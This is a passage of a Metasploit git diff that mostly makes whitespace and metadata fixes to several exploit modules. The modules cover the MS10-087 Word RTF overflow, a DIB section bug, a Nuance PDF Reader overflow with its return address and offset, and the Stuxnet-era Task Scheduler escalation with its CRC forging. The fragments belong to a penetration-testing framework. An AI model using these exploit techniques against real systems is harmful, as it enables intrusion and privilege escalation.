'pFragments' shape property within the Microsoft Word RTF parser. All versions
- of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the
+ of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the
MS10-087 bulletin are vulnerable.
This module does not attempt to exploit the vulnerability via Microsoft Outlook.
- The Microsoft Word RTF parser was only used by default in versions of Microsoft
+ The Microsoft Word RTF parser was only used by default in versions of Microsoft
Word itself prior to Office 2007. With the release of Office 2007, Microsoft
began using the Word RTF parser, by default, to handle rich-text messages within
Outlook as well. It was possible to configure Outlook 2003 and earlier to use
@@ -154,7 +154,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Stick fake SEH frames here and there ;)
if target.name == "Automatic"
targets.each { |t|
- next if t.name !~ /Windows/i
+ next if t.name !~ /Windows/i
add_target(rest, t)
}
@@ -178,7 +178,7 @@ class Metasploit3 < Msf::Exploit::Remote
content << "}"
print_status("Creating '#{datastore['FILENAME']}' file ...")
- file_create(content)
+ file_create(content)
end
diff --git a/modules/exploits/windows/fileformat/ms11_xxx_createsizeddibsection.rb b/modules/exploits/windows/fileformat/ms11_xxx_createsizeddibsection.rb
index 3d2089b0f1..e11920ba5f 100644
--- a/modules/exploits/windows/fileformat/ms11_xxx_createsizeddibsection.rb
+++ b/modules/exploits/windows/fileformat/ms11_xxx_createsizeddibsection.rb
@@ -165,7 +165,7 @@ class Metasploit3 < Msf::Exploit::Remote
if target.name == "Automatic"
targets.each { |t|
- next if t.name !~ /Windows/i
+ next if t.name !~ /Windows/i
add_target(data, t)
}
diff --git a/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb b/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb
index c4f986e59b..3d702f9705 100644
--- a/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb
+++ b/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb
@@ -47,6 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'Nuance PDF Reader v6.x (XP SP3)', { 'Ret' => 0x10191579, 'Offset' => 1290 } ] #ppr - pluscore.dll
],
+ 'DisclosureDate' => 'Oct 08 2010',
'DefaultTarget' => 0))
register_options(
diff --git a/modules/post/windows/escalate/schelevator.rb b/modules/post/windows/escalate/schelevator.rb
index 7698d55050..df596d419b 100644
--- a/modules/post/windows/escalate/schelevator.rb
+++ b/modules/post/windows/escalate/schelevator.rb
@@ -19,7 +19,7 @@ class Metasploit3 < Msf::Post
def initialize(info={})
super( update_info( info,
'Name' => 'Schelevator',
- 'Description' => %q{
+ 'Description' => %q{
This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
NOTE: Thanks to webDEViL for the information about disable/enable.
},
@@ -324,7 +324,7 @@ class Metasploit3 < Msf::Post
crc = crc32(data[0, data.length - 12])
data[-12, 4] = [crc].pack('V')
-
+
data[-12, 12].unpack('C*').reverse.each { |b|
old_crc = ((old_crc << 8) ^ bwd_table[old_crc >> 24] ^ b) & 0xffffffff
}